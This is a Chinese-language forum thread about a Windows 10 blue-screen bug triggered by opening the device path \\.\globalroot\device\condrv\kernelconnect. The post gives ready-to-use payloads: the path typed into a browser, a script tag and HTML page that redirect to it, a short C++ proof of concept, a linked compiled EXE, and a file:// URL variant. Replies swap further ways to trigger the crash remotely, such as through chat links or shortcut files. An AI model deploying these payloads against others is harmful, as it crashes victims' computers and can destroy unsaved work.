Windows 10 BSOD 蓝屏bug

针对此漏洞,据国外的安全研究员的说法,去年大概10月就向微软报告了,具体就是在 Chrome(应该是Chromium 内核的浏览器都会触发此漏洞)的地址栏中输入如下命令:

\\.\globalroot\device\condrv\kernelconnect

接着会蓝屏崩溃,此漏洞在 Win 10 1709 及之后的版本都存在。

当然,此漏洞还有其他利用方式:

  • XSS
<script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script>

将其写入一个简单的 html ,比如:

<html>
<head>
</head>
<body>
<script>document.location = '\\\\.\\globalroot\\device\\condrv\\kernelconnect';</script>
</body>
</html>
  • 可执行文件的 POC

参考 https://www.52pojie.cn/thread-1354077-1-1.html 这篇文章,按照大佬的复现代码编译之后,电脑直接蓝屏,XD;由此可见此漏洞是 Windows 10底层的漏洞,只不过是 Chrome 恰好解析了,利用代码如下:

#include <iostream>
#include <Windows.h>
int main()
{
    WCHAR fileName[] = L"\\\\.\\globalroot\\device\\condrv\\kernelconnect";
    WIN32_FILE_ATTRIBUTE_DATA data;
    GetFileAttributesEx(fileName, GetFileExInfoStandard, &data);
}

编译好的作死 EXE 在附件
Bsod.zip (4.5 KB)

参考:

1 Like

Chrome有限制啊,不能访问本地文件的,这除非是让人家自己打开html文档,访问远程服务器的话触发不了。现在还有种方式,就是制作一个url快捷方式,访问文件夹也是稳定触发

对,远程的话打开 html 文档或编译的 exe :smirk:

有个大佬鼓捣出来用微信的链接触发了,很想知道那个是怎么实现的

我猜测是利用 XSS,只是愚见,大佬的骚姿势太多了

新版的Edge不知道能不能复现

尝试了一下,蓝了。。。 :rofl:
image

IE 和火狐也可以的

补充一下:
微信 url 触发利用了 file 协议: file:///globalroot/device/condrv/kernelconnect